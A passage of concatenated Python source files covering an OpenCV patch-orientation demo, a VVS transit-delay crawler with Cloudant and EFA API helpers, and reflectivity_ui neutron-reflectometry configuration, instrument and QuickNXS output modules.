mode = modes[modes.index(mode) + 1] if modes.index(mode) + 1 < len(modes) else modes[0]
if pressedKey == ord('p'):
# save a screenshot of the image
cv2.imwrite('live.png', rgb)
if pressedKey == ord('+'):
# increase the patch area
HALF_PATCH_SIZE += 1
PATCH_SIZE += 2
HALF_PATCH_SIZE = limit(HALF_PATCH_SIZE, 2, 20)
PATCH_SIZE = limit(PATCH_SIZE, 5, 41)
umax = calc_umax()
continue
if pressedKey == ord('-'):
# decrease the patch area
HALF_PATCH_SIZE -= 1
PATCH_SIZE -= 2
HALF_PATCH_SIZE = limit(HALF_PATCH_SIZE, 2, 20)
PATCH_SIZE = limit(PATCH_SIZE, 5, 41)
umax = calc_umax()
continue
#sleep(0.001)
```
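As an added sanity check (to run in the same context as the functions above; cv2 and numpy are already imported there): the intensity centroid of a patch whose brightness increases to the right should give an orientation near 0 degrees.
```python
test_img = np.tile(np.arange(64, dtype=np.uint8), (64, 1))  # brightness grows left to right
test_umax = calc_umax()
test_angle, tcx, tcy = IC_Angle(test_img, (32, 32), test_umax)
print('synthetic patch angle:', test_angle)  # expected to be close to 0 (or 360) degrees
```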
|
{
"source": "jenerous/vvs-delay",
"score": 3
}
|
#### File: crawler/crawlerhelpers/cloudant_db.py
```python
from cloudant import Cloudant
import json
import os
def get_db_session(cred_file):
creds = None
if 'VCAP_SERVICES' in os.environ:
vcap = json.loads(os.getenv('VCAP_SERVICES'))
print('Found VCAP_SERVICES')
if 'cloudantNoSQLDB' in vcap:
creds = vcap['cloudantNoSQLDB'][0]['credentials']
elif os.path.isfile(cred_file):
with open(cred_file) as f:
vcap = json.load(f)
print('Found local VCAP_SERVICES')
creds = vcap['services']['cloudantNoSQLDB'][0]['credentials']
url = 'https://' + creds['host']
user = creds['username']
password = creds['password']
client = Cloudant(user, password, url=url, connect=True)
return client
```
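A short usage sketch (added here, not part of the repository); the credentials file name is hypothetical, and the helper above returns a python-cloudant client:
```python
if __name__ == '__main__':
    client = get_db_session('vcap-local.json')  # hypothetical local credentials file
    print(client.all_dbs())                     # list databases visible to this account
    client.disconnect()
```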
#### File: crawler/crawlerhelpers/efa_beta.py
```python
from time import strftime
class API_efaBeta(object):
def __init__( self ):
self.name = 'efaBeta'
self.baseurl = 'https://www3.vvs.de/mngvvs/XML_DM_REQUEST'
def convert_station_id( self, station_id ):
"""
convert station id that is given to the api specific
representation if necessary
@param station_id: id in general representation
@return id in api specific representation
"""
return station_id
def get_params( self, current_time_raw, station ):
"""
@param current_time_raw: time as gmtime object
@param station: station id in general representation
@return dict with key value pairs for api parameters
"""
itdDate = strftime("%Y%m%d", current_time_raw)
itdTime = strftime("%H%M", current_time_raw)
return {
'SpEncId' : 0,
'coordOutputFormat' : "EPSG:4326",
'deleteAssignedStops' : 1,
'itdDate' : itdDate,
'itdTime' : itdTime,
'limit' : 50,
'mode' : "direct",
'name_dm' : "de:8111:{}".format(self.convert_station_id(station)),
'outputFormat' : "rapidJSON",
'serverInfo' : "1",
'type_dm' : "any",
'useRealtime' : "1",
'version' : "10.2.2.48"
}
def function_to_call( self, results ):
"""
function that gets called on an api response
@param results: queue object of the api that contains result dicts from
the api call.
{
'timestamp': gmtime object -> when was the api call made
'name': api's name (id),
'station': station id,
'results': crawl results -> what came back from api
}
"""
results.put(None)
converted_results = []
for r in iter(results.get, None):
station = {}
current_dict = {}
station[r['station']] = [current_dict]
current_dict['timestamp'] = strftime('%Y-%m-%dT%H:%M:%SZ', r['timestamp']) # "2017-04-14 TEST"
current_dict['lines'] = {}
if 'results' not in r or 'stopEvents' not in r['results']:
continue
stop_events = filter(lambda elem:
elem['transportation']['product']['name']
== 'S-Bahn', r['results']['stopEvents'])
for st_event in stop_events:
departure_dict = {}
# print st_event
if 'isRealtimeControlled' in st_event:
departure_dict['isRealtimeControlled'] = st_event['isRealtimeControlled']
else:
departure_dict['isRealtimeControlled'] = False
if 'isRealtimeControlled' in departure_dict and 'departureTimeEstimated' in st_event:
departure_dict['departureTimeEstimated'] = st_event['departureTimeEstimated']
# else:
# departure_dict['departureTimeEstimated'] = None
departure_dict['departureTimePlanned'] = st_event['departureTimePlanned']
if 'infos' in st_event:
departure_dict['infos'] = []
for i in range(len(st_event['infos'])):
info = {}
if 'content' in st_event['infos'][i]:
info['content'] = st_event['infos'][i]['content']
else:
info['content'] = ""
info['title'] = st_event['infos'][i]['title']
info['subtitle'] = st_event['infos'][i]['subtitle']
info['properties'] = st_event['infos'][i]['properties']
departure_dict['infos'].append(info)
line = st_event['transportation']['number']
departure_dict['name'] = st_event['transportation']['product']['name']
departure_dict['class'] = st_event['transportation']['product']['class']
if line in current_dict['lines']:
current_dict['lines'][line].append(departure_dict)
else:
current_dict['lines'][line] = [departure_dict]
converted_results.append(station)
# print "Results: "
# with open("results.json", 'w') as output:
# json.dump(converted_results, output, indent=4)
# pprint(converted_results)
return converted_results
```
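A minimal usage sketch (added); the station id and the use of the requests library are assumptions and not part of the crawler:
```python
import time
import requests

api = API_efaBeta()
params = api.get_params(time.gmtime(), 6118)  # 6118 is a hypothetical station id
response = requests.get(api.baseurl, params=params)
print(response.status_code)
print(len(response.json().get('stopEvents', [])))  # departures returned by the endpoint
```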
#### File: crawler/crawlerhelpers/test_api.py
```python
class API_test(object):
"""testing API class"""
def __init__( self ):
self.name = 'TEST'
self.baseurl = 'https://127.0.0.1'
def convert_station_id( self, station_id ):
"""
convert station id that is given to the api specific
representation if necessary
@param station_id: id in general representation
@return id in api specific representation
"""
return station_id
def get_name( self ):
"""
return default name for api
"""
return ''
def get_base_url( self ):
"""
return default basic url for api
"""
return ''
def get_params( self, current_time_raw, station ):
"""
@param current_time_raw: time as gmtime object
@param station: station id in general representation
@return dict with key value pairs for api parameters
"""
return {
'test': 'test'
}
def function_to_call( self, results ):
"""
function that gets called on an api response
@param results: queue object of the api that contains result dicts from
the api call.
{
'timestamp': gmtime object -> when was the api call made
'name': api's name (id),
'station': station id,
'results': crawl results -> what came back from api
}
"""
results.put(None)
converted_results = []
for r in iter(results.get, None):
pass
```
|
{
"source": "jenest/reflectivity_ui",
"score": 2
}
|
#### File: reflectivity_ui/interfaces/configuration.py
```python
from __future__ import absolute_import, division, print_function
import sys
import logging
from .data_handling.instrument import Instrument
class Configuration(object):
"""
Hold reduction options
"""
# Choice of axes for off-specular binning
QX_VS_QZ = 0
KZI_VS_KZF = 1
DELTA_KZ_VS_QZ = 3
def __init__(self, settings=None):
self.instrument = Instrument()
# Number of TOF bins
self.tof_bins = 400
self.tof_range = [0,0]
# Bin type:
# 0 = Constant bin width
# 1 = Constant Q bin width
# 2 = Constant 1/wavelength bin width
self.tof_bin_type = 0
self.wl_bandwidth = 3.2
# Threshold under which we skip a cross-section, as fraction of the max count
self.count_threshold = 0.01
self.tof_overwrite = None
# Reduction parameters
# Use region of interest specified in meta data
self.use_roi = True
self.set_direct_pixel = False
self.direct_pixel_overwrite = 0
self.set_direct_angle_offset = False
self.direct_angle_offset_overwrite = 0
self.use_dangle = False
self.use_constant_q = False
self.sample_size = 10
# Update the specular peak range after finding the peak
# within the ROI
self.update_peak_range = False
# Use background specified in the meta data, if available
self.use_roi_bck = False
self.use_tight_bck = False
self.bck_offset = 5
# Options to override the range
self.force_peak_roi = False
self.peak_position = 130
self.peak_width = 20
self.force_low_res_roi = False
self.low_res_position = 130
self.low_res_width = 20
self.force_bck_roi = False
self.bck_position = 30
self.bck_width = 20
# Subtract background
self.subtract_background = True
# Overall scaling factor
self.scaling_factor = 1.0
# Normalize to unity when stitching
self.normalize_to_unity = True
self.total_reflectivity_q_cutoff = 0.01
# Cut first and last N points
self.cut_first_n_points = 1
self.cut_last_n_points = 1
# Final Q rebin
self.do_final_rebin = True
self.final_rebin_step = -0.01
# UI elements
self.normalize_x_tof = False
self.x_wl_map = False
self.angle_map = False
self.log_1d = True
self.log_2d = True
# Off-specular options
self.off_spec_x_axis = Configuration.DELTA_KZ_VS_QZ
self.off_spec_slice = False
self.off_spec_qz_list = []
self.off_spec_slice_qz_min = 0.05
self.off_spec_slice_qz_max = 0.07
self.off_spec_err_weight = False
self.off_spec_nxbins = 450
self.off_spec_nybins = 200
# Off-specular smoothing
self.apply_smoothing = False
self.off_spec_sigmas = 3
self.off_spec_sigmax = 0.0005
self.off_spec_sigmay = 0.0005
self.off_spec_x_min = -0.015
self.off_spec_x_max = 0.015
self.off_spec_y_min = 0.0
self.off_spec_y_max = 0.15
# GISANS options
self.gisans_wl_min = 2.0
self.gisans_wl_max = 8.0
self.gisans_wl_npts = 2
self.gisans_qy_npts = 50
self.gisans_qz_npts = 50
self.gisans_use_pf = False
# Reduction options
self.match_direct_beam = False
self.normalization = None
if settings is not None:
try:
self.from_q_settings(settings)
except:
logging.error("Could not process application settings\n %s", sys.exc_value)
@property
def peak_roi(self):
peak_min = int(round(float(self.peak_position) - float(self.peak_width)/2.0))
peak_max = int(round(float(self.peak_position) + float(self.peak_width)/2.0+1.0))
return [peak_min, peak_max]
@peak_roi.setter
def peak_roi(self, value):
self.peak_position = (value[1] + value[0] - 1.0) / 2.0
self.peak_width = value[1] - value[0] - 1.0
@property
def low_res_roi(self):
peak_min = int(round(float(self.low_res_position) - float(self.low_res_width)/2.0))
peak_max = int(round(float(self.low_res_position) + float(self.low_res_width)/2.0+1.0))
return [peak_min, peak_max]
@low_res_roi.setter
def low_res_roi(self, value):
self.low_res_position = (value[1] + value[0] - 1.0) / 2.0
self.low_res_width = value[1] - value[0] - 1.0
@property
def bck_roi(self):
peak_min = int(round(float(self.bck_position) - float(self.bck_width)/2.0))
peak_max = int(round(float(self.bck_position) + float(self.bck_width)/2.0+1.0))
return [peak_min, peak_max]
@bck_roi.setter
def bck_roi(self, value):
self.bck_position = (value[1] + value[0]) / 2.0
self.bck_width = value[1] - value[0] + 1
def to_q_settings(self, settings):
"""
Save configuration to QSettings
:param settings QSettings: QSettings object
"""
settings.setValue('use_roi', self.use_roi)
settings.setValue('tof_bins', self.tof_bins)
settings.setValue('tof_range', ','.join([str(x) for x in self.tof_range]))
settings.setValue('tof_bin_type', self.tof_bin_type)
settings.setValue('update_peak_range', self.update_peak_range)
settings.setValue('use_roi_bck', self.use_roi_bck)
settings.setValue('use_tight_bck', self.use_tight_bck)
settings.setValue('bck_offset', self.bck_offset)
settings.setValue('wl_bandwidth', self.wl_bandwidth)
settings.setValue('force_peak_roi', self.force_peak_roi)
settings.setValue('peak_roi', ','.join([str(x) for x in self.peak_roi]))
settings.setValue('force_low_res_roi', self.force_low_res_roi)
settings.setValue('low_res_roi', ','.join([str(x) for x in self.low_res_roi]))
settings.setValue('force_bck_roi', self.force_bck_roi)
settings.setValue('bck_roi', ','.join([str(x) for x in self.bck_roi]))
settings.setValue('subtract_background', self.subtract_background)
settings.setValue('scaling_factor', self.scaling_factor)
settings.setValue('cut_first_n_points', self.cut_first_n_points)
settings.setValue('cut_last_n_points', self.cut_last_n_points)
# Normalize to unity when stitching
settings.setValue('normalize_to_unity', self.normalize_to_unity)
settings.setValue('total_reflectivity_q_cutoff', self.total_reflectivity_q_cutoff)
settings.setValue('normalize_x_tof', self.normalize_x_tof)
settings.setValue('x_wl_map', self.x_wl_map)
settings.setValue('angle_map', self.angle_map)
settings.setValue('log_1d', self.log_1d)
settings.setValue('log_2d', self.log_2d)
settings.setValue('use_constant_q', self.use_constant_q)
settings.setValue('use_dangle', self.use_dangle)
settings.setValue('set_direct_pixel', self.set_direct_pixel)
settings.setValue('direct_pixel_overwrite', self.direct_pixel_overwrite)
settings.setValue('set_direct_angle_offset', self.set_direct_angle_offset)
settings.setValue('direct_angle_offset_overwrite', self.direct_angle_offset_overwrite)
settings.setValue('sample_size', self.sample_size)
settings.setValue('do_final_rebin', self.do_final_rebin)
settings.setValue('final_rebin_step', self.final_rebin_step)
# Off-specular options
settings.setValue('off_spec_x_axis', self.off_spec_x_axis)
settings.setValue('off_spec_slice', self.off_spec_slice)
settings.setValue('off_spec_qz_list', ','.join([str(x) for x in self.off_spec_qz_list]))
settings.setValue('off_spec_err_weight', self.off_spec_err_weight)
settings.setValue('off_spec_nxbins', self.off_spec_nxbins)
settings.setValue('off_spec_nybins', self.off_spec_nybins)
settings.setValue('off_spec_slice_qz_min', self.off_spec_slice_qz_min)
settings.setValue('off_spec_slice_qz_max', self.off_spec_slice_qz_max)
# Off-specular smoothing
settings.setValue('apply_smoothing', self.apply_smoothing)
settings.setValue('off_spec_sigmas', self.off_spec_sigmas)
settings.setValue('off_spec_sigmax', self.off_spec_sigmax)
settings.setValue('off_spec_sigmay', self.off_spec_sigmay)
settings.setValue('off_spec_x_min', self.off_spec_x_min)
settings.setValue('off_spec_x_max', self.off_spec_x_max)
settings.setValue('off_spec_y_min', self.off_spec_y_min)
settings.setValue('off_spec_y_max', self.off_spec_y_max)
# GISANS options
settings.setValue('gisans_wl_min', self.gisans_wl_min)
settings.setValue('gisans_wl_max', self.gisans_wl_max)
settings.setValue('gisans_wl_npts', self.gisans_wl_npts)
settings.setValue('gisans_qy_npts', self.gisans_qy_npts)
settings.setValue('gisans_qz_npts', self.gisans_qz_npts)
settings.setValue('gisans_use_pf', self.gisans_use_pf)
def from_q_settings(self, settings):
""" Retrieve configuration from QSettings """
def _verify_true(parameter, default):
""" Utility function to read a bool """
_value = settings.value(parameter, str(default))
return str(_value).lower() == 'true'
self.use_roi = _verify_true('use_roi', self.use_roi)
#self.tof_bins = int(settings.value('tof_bins', self.tof_bins))
self.tof_range = [float(x) for x in settings.value('tof_range', '0,0').split(',')]
self.tof_bin_type = int(settings.value('tof_bin_type', self.tof_bin_type))
self.update_peak_range = _verify_true('update_peak_range', self.update_peak_range)
self.use_roi_bck = _verify_true('use_roi_bck', self.use_roi_bck)
self.use_tight_bck = _verify_true('use_tight_bck', self.use_tight_bck)
self.bck_offset = int(settings.value('bck_offset', self.bck_offset))
self.wl_bandwidth = float(settings.value('wl_bandwidth', self.wl_bandwidth))
self.force_peak_roi = _verify_true('force_peak_roi', self.force_peak_roi)
self.force_low_res_roi = _verify_true('force_low_res_roi', self.force_low_res_roi)
self.force_bck_roi = _verify_true('force_bck_roi', self.force_bck_roi)
default = ','.join([str(x) for x in self.peak_roi])
self.peak_roi = [int(x) for x in settings.value('peak_roi', default).split(',')]
default = ','.join([str(x) for x in self.low_res_roi])
self.low_res_roi = [int(x) for x in settings.value('low_res_roi', default).split(',')]
default = ','.join([str(x) for x in self.bck_roi])
self.bck_roi = [int(x) for x in settings.value('bck_roi', default).split(',')]
self.subtract_background = _verify_true('subtract_background', self.subtract_background)
self.scaling_factor = float(settings.value('scaling_factor', self.scaling_factor))
self.cut_first_n_points = int(settings.value('cut_first_n_points', self.cut_first_n_points))
self.cut_last_n_points = int(settings.value('cut_last_n_points', self.cut_last_n_points))
# Normalize to unity when stitching
self.normalize_to_unity = _verify_true('normalize_to_unity', self.normalize_to_unity)
self.total_reflectivity_q_cutoff = float(settings.value('total_reflectivity_q_cutoff', self.total_reflectivity_q_cutoff))
self.normalize_x_tof = _verify_true('normalize_x_tof', self.normalize_x_tof)
self.x_wl_map = _verify_true('x_wl_map', self.x_wl_map)
self.angle_map = _verify_true('angle_map', self.angle_map)
self.log_1d = _verify_true('log_1d', self.log_1d)
self.log_2d = _verify_true('log_2d', self.log_2d)
self.use_constant_q = _verify_true('use_constant_q', self.use_constant_q)
self.use_dangle = _verify_true('use_dangle', self.use_dangle)
self.set_direct_pixel = _verify_true('set_direct_pixel', self.set_direct_pixel)
self.direct_pixel_overwrite = float(settings.value('direct_pixel_overwrite', self.direct_pixel_overwrite))
self.set_direct_angle_offset = _verify_true('set_direct_angle_offset', self.set_direct_angle_offset)
self.direct_angle_offset_overwrite = float(settings.value('direct_angle_offset_overwrite', self.direct_angle_offset_overwrite))
self.sample_size = float(settings.value('sample_size', self.sample_size))
self.do_final_rebin = _verify_true('do_final_rebin', self.do_final_rebin)
self.final_rebin_step = float(settings.value('final_rebin_step', self.final_rebin_step))
# Off-specular options
self.off_spec_x_axis = int(settings.value('off_spec_x_axis', self.off_spec_x_axis))
self.off_spec_slice = _verify_true('off_spec_slice', self.off_spec_slice)
default = ','.join([str(x) for x in self.off_spec_qz_list])
try:
self.off_spec_qz_list = [float(x) for x in settings.value('off_spec_qz_list', default).split(',')]
except:
self.off_spec_qz_list = []
self.off_spec_err_weight = _verify_true('off_spec_err_weight', self.off_spec_err_weight)
self.off_spec_nxbins = int(settings.value('off_spec_nxbins', self.off_spec_nxbins))
self.off_spec_nybins = int(settings.value('off_spec_nybins', self.off_spec_nybins))
self.off_spec_slice_qz_min = float(settings.value('off_spec_slice_qz_min', self.off_spec_slice_qz_min))
self.off_spec_slice_qz_max = float(settings.value('off_spec_slice_qz_max', self.off_spec_slice_qz_max))
# Off-specular smoothing
self.apply_smoothing = _verify_true('apply_smoothing', self.apply_smoothing)
self.off_spec_sigmas = int(settings.value('off_spec_sigmas', self.off_spec_sigmas))
self.off_spec_sigmax = float(settings.value('off_spec_sigmax', self.off_spec_sigmax))
self.off_spec_sigmay = float(settings.value('off_spec_sigmay', self.off_spec_sigmay))
self.off_spec_x_min = float(settings.value('off_spec_x_min', self.off_spec_x_min))
self.off_spec_x_max = float(settings.value('off_spec_x_max', self.off_spec_x_max))
self.off_spec_y_min = float(settings.value('off_spec_y_min', self.off_spec_y_min))
self.off_spec_y_max = float(settings.value('off_spec_y_max', self.off_spec_y_max))
# GISANS options
self.gisans_wl_min = float(settings.value('gisans_wl_min', self.gisans_wl_min))
self.gisans_wl_max = float(settings.value('gisans_wl_max', self.gisans_wl_max))
self.gisans_wl_npts = int(settings.value('gisans_wl_npts', self.gisans_wl_npts))
self.gisans_qy_npts = int(settings.value('gisans_qy_npts', self.gisans_qy_npts))
self.gisans_qz_npts = int(settings.value('gisans_qz_npts', self.gisans_qz_npts))
self.gisans_use_pf = _verify_true('gisans_use_pf', self.gisans_use_pf)
```
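A small round-trip sketch (added; assumes a Qt binding such as PyQt5 is installed and that the package's relative imports resolve) showing how the QSettings persistence above is intended to be used:
```python
from PyQt5.QtCore import QSettings

config = Configuration()
config.peak_roi = [120, 141]        # drives peak_position / peak_width through the setter
settings = QSettings("test_org", "test_app")
config.to_q_settings(settings)

restored = Configuration(settings)  # __init__ calls from_q_settings()
print(restored.peak_roi)            # expected: [120, 141]
```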
#### File: interfaces/data_handling/instrument.py
```python
from __future__ import absolute_import, division, print_function
import sys
import os
import math
import logging
import numpy as np
# Import mantid according to the application configuration
from . import ApplicationConfiguration
application_conf = ApplicationConfiguration()
sys.path.insert(0, application_conf.mantid_path)
import mantid.simpleapi as api
# Option to use the slow flipper logs rather than the Analyzer/Polarizer logs
USE_SLOW_FLIPPER_LOG = True
# Constants
h = 6.626e-34 # m^2 kg s^-1
m = 1.675e-27 # kg
def get_cross_section_label(ws, entry_name):
"""
Return the proper cross-section label.
"""
entry_name = str(entry_name)
pol_is_on = entry_name.lower().startswith('on')
ana_is_on = entry_name.lower().endswith('on')
pol_label = ''
ana_label = ''
# Look for log that define whether OFF or ON is +
if 'PolarizerLabel' in ws.getRun():
pol_id = ws.getRun().getProperty("PolarizerLabel").value
if isinstance(pol_id, np.ndarray):
pol_id = int(pol_id[0])
if pol_id == 1:
pol_label = '+' if pol_is_on else '-'
elif pol_id == 0:
pol_label = '-' if pol_is_on else '+'
if 'AnalyzerLabel' in ws.getRun():
ana_id = ws.getRun().getProperty("AnalyzerLabel").value
if isinstance(ana_id, np.ndarray):
ana_id = int(ana_id[0])
if ana_id == 1:
ana_label = '+' if ana_is_on else '-'
elif ana_id == 0:
ana_label = '-' if ana_is_on else '+'
entry_name = entry_name.replace('_', '-')
if ana_label == '' and pol_label == '':
return entry_name
else:
return '%s%s' % (pol_label, ana_label)
class Instrument(object):
"""
Instrument class. Holds the data handling that is unique to a specific instrument.
"""
n_x_pixel = 304
n_y_pixel = 256
huber_x_cut = 6.5
peak_range_offset = 50
tolerance = 0.05
pixel_width = 0.0007
instrument_name = "REF_M"
instrument_dir = "/SNS/REF_M"
file_search_template = "/SNS/REF_M/*/nexus/REF_M_%s"
legacy_search_template = "/SNS/REF_M/*/data/REF_M_%s"
def __init__(self):
# Filtering
self.pol_state = application_conf.POL_STATE
self.pol_veto = application_conf.POL_VETO
self.ana_state = application_conf.ANA_STATE
self.ana_veto = application_conf.ANA_VETO
def dummy_filter_cross_sections(self, ws):
"""
Filter events according to an aggregated state log.
:param str file_path: file to read
BL4A:SF:ICP:getDI
015 (0000 1111): SF1=OFF, SF2=OFF, SF1Veto=OFF, SF2Veto=OFF
047 (0010 1111): SF1=ON, SF2=OFF, SF1Veto=OFF, SF2Veto=OFF
031 (0001 1111): SF1=OFF, SF2=ON, SF1Veto=OFF, SF2Veto=OFF
063 (0011 1111): SF1=ON, SF2=ON, SF1Veto=OFF, SF2Veto=OFF
"""
state_log = "BL4A:SF:ICP:getDI"
states = {'Off_Off': 15,
'On_Off': 47,
'Off_On': 31,
'On_On': 63}
cross_sections = []
for pol_state in ['Off_Off', 'On_On', 'Off_On', 'On_Off']:
try:
_ws = api.FilterByLogValue(InputWorkspace=ws, LogName=state_log, TimeTolerance=0.1,
MinimumValue=states[pol_state],
MaximumValue=states[pol_state], LogBoundary='Left',
OutputWorkspace='%s_entry-%s' % (ws.getRunNumber(), pol_state))
_ws.getRun()['cross_section_id'] = pol_state
cross_sections.append(_ws)
except:
logging.error("Could not filter %s: %s", pol_state, sys.exc_info()[1])
return cross_sections
def load_data(self, file_path):
"""
Load a data set according to the needs of the instrument.
Returns a WorkspaceGroup with any number of cross-sections.
:param str file_path: path to the data file
"""
# Be careful with legacy data
is_legacy = file_path.endswith(".nxs")
if is_legacy or not USE_SLOW_FLIPPER_LOG:
base_name = os.path.basename(file_path)
_xs_list = api.MRFilterCrossSections(Filename=file_path,
PolState=self.pol_state,
AnaState=self.ana_state,
PolVeto=self.pol_veto,
AnaVeto=self.ana_veto,
CrossSectionWorkspaces="%s_entry" % base_name)
# Only keep good workspaced and get rid of the rejected events
xs_list = [ws for ws in _xs_list if not ws.getRun()['cross_section_id'].value == 'unfiltered']
else:
ws = api.LoadEventNexus(Filename=file_path, OutputWorkspace="raw_events")
xs_list = self.dummy_filter_cross_sections(ws)
return xs_list
@classmethod
def mid_q_value(cls, ws):
"""
Get the mid q value, at the requested wl mid-point.
This is used when sorting out data sets and doesn't need any overwrites.
:param workspace ws: Mantid workspace
"""
wl = ws.getRun().getProperty('LambdaRequest').value[0]
theta_d = api.MRGetTheta(ws)
return 4.0*math.pi*math.sin(theta_d) / wl
@classmethod
def scattering_angle_from_data(cls, data_object):
"""
Compute the scattering angle from a CrossSectionData object, in degrees.
@param data_object: CrossSectionData object
"""
_dirpix = data_object.configuration.direct_pixel_overwrite if data_object.configuration.set_direct_pixel else None
_dangle0 = data_object.configuration.direct_angle_offset_overwrite if data_object.configuration.set_direct_angle_offset else None
return api.MRGetTheta(data_object.event_workspace,
SpecularPixel=data_object.configuration.peak_position,
DAngle0Overwrite=_dangle0,
DirectPixelOverwrite=_dirpix) * 180.0 / math.pi
@classmethod
def check_direct_beam(cls, ws):
"""
Determine whether this data is a direct beam
"""
try:
return ws.getRun().getProperty("data_type").value[0] == 1
except:
return False
def direct_beam_match(self, scattering, direct_beam, skip_slits=False):
"""
Verify whether two data sets are compatible.
"""
if math.fabs(scattering.lambda_center-direct_beam.lambda_center) < self.tolerance \
and (skip_slits or \
(math.fabs(scattering.slit1_width-direct_beam.slit1_width) < self.tolerance \
and math.fabs(scattering.slit2_width-direct_beam.slit2_width) < self.tolerance \
and math.fabs(scattering.slit3_width-direct_beam.slit3_width) < self.tolerance)):
return True
return False
@classmethod
def get_info(cls, workspace, data_object):
"""
Retrieve information that is specific to this particular instrument
@param workspace: Mantid workspace
@param data_object: CrossSectionData object
"""
data = workspace.getRun()
data_object.lambda_center = data['LambdaRequest'].value[0]
data_object.dangle = data['DANGLE'].getStatistics().mean
if 'BL4A:Mot:S1:X:Gap' in data:
data_object.slit1_width = data['BL4A:Mot:S1:X:Gap'].value[0]
data_object.slit2_width = data['BL4A:Mot:S2:X:Gap'].value[0]
data_object.slit3_width = data['BL4A:Mot:S3:X:Gap'].value[0]
else:
data_object.slit1_width = data['S1HWidth'].value[0]
data_object.slit2_width = data['S2HWidth'].value[0]
data_object.slit3_width = data['S3HWidth'].value[0]
data_object.huber_x = data['HuberX'].getStatistics().mean
data_object.sangle = data['SANGLE'].getStatistics().mean
data_object.dist_sam_det = data['SampleDetDis'].value[0]*1e-3
data_object.dist_mod_det = data['ModeratorSamDis'].value[0]*1e-3+data_object.dist_sam_det
data_object.dist_mod_mon = data['ModeratorSamDis'].value[0]*1e-3-2.75
# Get these from instrument
data_object.pixel_width = float(workspace.getInstrument().getNumberParameter("pixel-width")[0]) / 1000.0
data_object.n_det_size_x = int(workspace.getInstrument().getNumberParameter("number-of-x-pixels")[0]) # 304
data_object.n_det_size_y = int(workspace.getInstrument().getNumberParameter("number-of-y-pixels")[0]) # 256
data_object.det_size_x = data_object.n_det_size_x * data_object.pixel_width # horizontal size of detector [m]
data_object.det_size_y = data_object.n_det_size_y * data_object.pixel_width # vertical size of detector [m]
# The following active area used to be taken from instrument.DETECTOR_REGION
data_object.active_area_x = (8, 295)
data_object.active_area_y = (8, 246)
# Convert to standard names
data_object.direct_pixel = data['DIRPIX'].getStatistics().mean
data_object.angle_offset = data['DANGLE0'].getStatistics().mean
# Get proper cross-section label
data_object.cross_section_label = get_cross_section_label(workspace, data_object.entry_name)
try:
data_object.is_direct_beam = data["data_type"].value[0] == 1
except:
data_object.is_direct_beam = False
def integrate_detector(self, ws, specular=True):
"""
Integrate a workspace along either the main direction (specular=False) or
the low-resolution direction (specular=True).
:param ws: Mantid workspace
:param specular bool: if True, the low-resolution direction is integrated over
"""
ws_summed = api.RefRoi(InputWorkspace=ws, IntegrateY=specular,
NXPixel=self.n_x_pixel, NYPixel=self.n_y_pixel,
ConvertToQ=False,
OutputWorkspace="ws_summed")
integrated = api.Integration(ws_summed)
integrated = api.Transpose(integrated)
return integrated
```
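An added sketch (assuming the module imports cleanly, i.e. Mantid and the application configuration are available) of the direct-beam matching tolerance above, using SimpleNamespace stand-ins instead of real CrossSectionData objects:
```python
from types import SimpleNamespace

instrument = Instrument()
scatt = SimpleNamespace(lambda_center=4.25, slit1_width=0.50, slit2_width=0.50, slit3_width=0.50)
direct = SimpleNamespace(lambda_center=4.27, slit1_width=0.52, slit2_width=0.50, slit3_width=0.50)
print(instrument.direct_beam_match(scatt, direct))                   # True: all differences < 0.05
print(instrument.direct_beam_match(scatt, direct, skip_slits=True))  # True: only wavelength compared
```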
#### File: interfaces/data_handling/quicknxs_io.py
```python
from __future__ import absolute_import, division, print_function
import sys
import os
import time
import copy
import math
import logging
import numpy as np
# Import mantid according to the application configuration
from . import ApplicationConfiguration
APP_CONF = ApplicationConfiguration()
sys.path.insert(0, APP_CONF.mantid_path)
import mantid
from ... import __version__
from ..configuration import Configuration
def _find_h5_data(filename):
"""
Because we have legacy data and new data re-processed for QuickNXS, we have to
ensure that we get the proper data file.
"""
if filename.endswith('.nxs'):
_new_filename = filename.replace('_histo.nxs', '.nxs.h5')
_new_filename = _new_filename.replace('_event.nxs', '.nxs.h5')
_new_filename = _new_filename.replace('data', 'nexus')
if os.path.isfile(_new_filename):
logging.warning("Using %s" % _new_filename)
return _new_filename
return filename
def write_reflectivity_header(reduction_list, direct_beam_list, output_path, pol_states):
"""
Write out reflectivity header in a format readable by QuickNXS
:param str output_path: output file path
:param str pol_states: descriptor for the polarization state
"""
# Sanity check
if not reduction_list:
return
direct_beam_options = ['DB_ID', 'P0', 'PN', 'x_pos', 'x_width', 'y_pos', 'y_width',
'bg_pos', 'bg_width', 'dpix', 'tth', 'number', 'File']
dataset_options = ['scale', 'P0', 'PN', 'x_pos', 'x_width', 'y_pos', 'y_width',
'bg_pos', 'bg_width', 'fan', 'dpix', 'tth', 'number', 'DB_ID', 'File']
fd = open(output_path, 'w')
fd.write("# Datafile created by QuickNXS %s\n" % __version__)
fd.write("# Datafile created using Mantid %s\n" % mantid.__version__)
fd.write("# Date: %s\n" % time.strftime(u"%Y-%m-%d %H:%M:%S"))
fd.write("# Type: Specular\n")
run_list = [str(item.number) for item in reduction_list]
fd.write("# Input file indices: %s\n" % ','.join(run_list))
fd.write("# Extracted states: %s\n" % pol_states)
fd.write("#\n")
fd.write("# [Direct Beam Runs]\n")
toks = ['%8s' % item for item in direct_beam_options]
fd.write("# %s\n" % ' '.join(toks))
# Get the list of cross-sections
pol_list = list(reduction_list[0].cross_sections.keys())
if not pol_list:
logging.error("No data found in run %s", reduction_list[0].number)
return
# Direct beam section
i_direct_beam = 0
for data_set in reduction_list:
run_object = data_set.cross_sections[pol_list[0]].reflectivity_workspace.getRun()
normalization_run = run_object.getProperty("normalization_run").value
if normalization_run == "None":
continue
direct_beam = None
for db_i in direct_beam_list:
if str(db_i.number) == str(normalization_run):
direct_beam = db_i
if direct_beam is None:
continue
db_pol = list(direct_beam.cross_sections.keys())[0]
conf = direct_beam.cross_sections[db_pol].configuration
i_direct_beam += 1
dpix = run_object.getProperty("normalization_dirpix").value
filename = run_object.getProperty("normalization_file_path").value
item = dict(DB_ID=i_direct_beam, tth=0, P0=0, PN=0,
x_pos=conf.peak_position,
x_width=conf.peak_width,
y_pos=conf.low_res_position,
y_width=conf.low_res_width,
bg_pos=conf.bck_position,
bg_width=conf.bck_width,
dpix=dpix,
number=normalization_run,
File=filename)
par_list = ['{%s}' % p for p in direct_beam_options]
template = "# %s\n" % ' '.join(par_list)
_clean_dict = {}
for key in item:
if isinstance(item[key], (bool, str)):
_clean_dict[key] = "%8s" % item[key]
else:
_clean_dict[key] = "%8g" % item[key]
